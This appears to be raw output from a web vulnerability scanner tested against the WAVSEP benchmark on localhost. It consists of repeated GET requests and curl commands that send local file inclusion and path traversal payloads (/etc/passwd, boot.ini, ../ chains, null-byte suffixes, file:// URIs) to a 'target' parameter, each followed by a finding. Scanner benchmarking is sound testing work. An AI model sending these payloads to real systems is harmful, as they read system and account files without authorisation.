curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case11-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-NoPathReq-Read.jsp?target=%2Fetc%2Fpasswd"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case11-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-NoPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case11-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-NoPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case11-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-NoPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case11-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-NoPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case11-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-NoPathReq-Read.jsp?target=%2Fetc%2Fservices HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case11-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-NoPathReq-Read.jsp?target=%2Fetc%2Fservices"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case11-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-NoPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case11-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-NoPathReq-Read.jsp?target=%2Fetc%2Fservices%00 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case11-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-NoPathReq-Read.jsp?target=%2Fetc%2Fservices%00"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case11-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-NoPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case11-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-NoPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case11-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-NoPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case11-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-NoPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case11-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-NoPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case11-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-NoPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case11-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-NoPathReq-Read.jsp

Linux local file disclosure vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case11-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-NoPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case11-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-NoPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case14-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultEmptyInput-NoPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case14-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultEmptyInput-NoPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case14-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultEmptyInput-NoPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case14-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultEmptyInput-NoPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case14-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultEmptyInput-NoPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case14-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultEmptyInput-NoPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case14-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultEmptyInput-NoPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case14-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultEmptyInput-NoPathReq-Read.jsp?target=file%3A%2F%2Fc%3A%5C%5Cboot.ini HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case14-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultEmptyInput-NoPathReq-Read.jsp?target=file%3A%2F%2Fc%3A%5C%5Cboot.ini"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case14-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultEmptyInput-NoPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case14-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultEmptyInput-NoPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00index.htm HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case14-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultEmptyInput-NoPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00index.htm"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case14-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultEmptyInput-NoPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case14-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultEmptyInput-NoPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00index.html HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case14-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultEmptyInput-NoPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00index.html"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case14-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultEmptyInput-NoPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case14-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultEmptyInput-NoPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00index.php HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case14-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultEmptyInput-NoPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00index.php"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case14-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultEmptyInput-NoPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case14-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultEmptyInput-NoPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00index.asp HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case14-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultEmptyInput-NoPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00index.asp"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case14-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultEmptyInput-NoPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case14-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultEmptyInput-NoPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00index.aspx HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case14-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultEmptyInput-NoPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00index.aspx"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case14-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultEmptyInput-NoPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case14-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultEmptyInput-NoPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00index.css HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case14-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultEmptyInput-NoPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00index.css"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case14-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultEmptyInput-NoPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case14-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultEmptyInput-NoPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00index.htm HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case14-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultEmptyInput-NoPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00index.htm"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case14-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultEmptyInput-NoPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case14-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultEmptyInput-NoPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00index.html HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case14-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultEmptyInput-NoPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00index.html"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case14-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultEmptyInput-NoPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case14-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultEmptyInput-NoPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00index.php HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case14-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultEmptyInput-NoPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00index.php"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case14-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultEmptyInput-NoPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case14-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultEmptyInput-NoPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00index.asp HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case14-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultEmptyInput-NoPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00index.asp"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case14-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultEmptyInput-NoPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case14-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultEmptyInput-NoPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00index.aspx HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case14-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultEmptyInput-NoPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00index.aspx"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case14-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultEmptyInput-NoPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case14-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultEmptyInput-NoPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00index.css HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case14-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultEmptyInput-NoPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00index.css"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case14-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultEmptyInput-NoPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case14-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultEmptyInput-NoPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00index.htm HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case14-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultEmptyInput-NoPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00index.htm"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case14-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultEmptyInput-NoPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case14-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultEmptyInput-NoPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00index.html HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case14-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultEmptyInput-NoPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00index.html"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case14-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultEmptyInput-NoPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case14-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultEmptyInput-NoPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00index.php HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case14-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultEmptyInput-NoPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00index.php"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case14-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultEmptyInput-NoPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case14-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultEmptyInput-NoPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00index.asp HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case14-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultEmptyInput-NoPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00index.asp"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case14-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultEmptyInput-NoPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case14-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultEmptyInput-NoPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00index.aspx HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case14-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultEmptyInput-NoPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00index.aspx"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case14-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultEmptyInput-NoPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case14-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultEmptyInput-NoPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00index.css HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case14-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultEmptyInput-NoPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00index.css"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case14-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultEmptyInput-NoPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case14-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultEmptyInput-NoPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00pix.gif HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case14-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultEmptyInput-NoPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00pix.gif"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case14-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultEmptyInput-NoPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case14-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultEmptyInput-NoPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00index.htm HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case14-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultEmptyInput-NoPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00index.htm"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case14-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultEmptyInput-NoPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case14-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultEmptyInput-NoPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00index.html HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case14-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultEmptyInput-NoPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00index.html"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case14-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultEmptyInput-NoPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case14-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultEmptyInput-NoPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00index.php HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case14-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultEmptyInput-NoPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00index.php"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case14-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultEmptyInput-NoPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case14-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultEmptyInput-NoPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00index.asp HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case14-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultEmptyInput-NoPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00index.asp"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case14-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultEmptyInput-NoPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case14-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultEmptyInput-NoPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00index.aspx HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case14-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultEmptyInput-NoPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00index.aspx"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case14-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultEmptyInput-NoPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case14-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultEmptyInput-NoPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00index.css HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case14-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultEmptyInput-NoPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00index.css"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case14-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultEmptyInput-NoPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case14-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultEmptyInput-NoPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00pix.gix HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case14-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultEmptyInput-NoPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00pix.gix"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case14-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultEmptyInput-NoPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
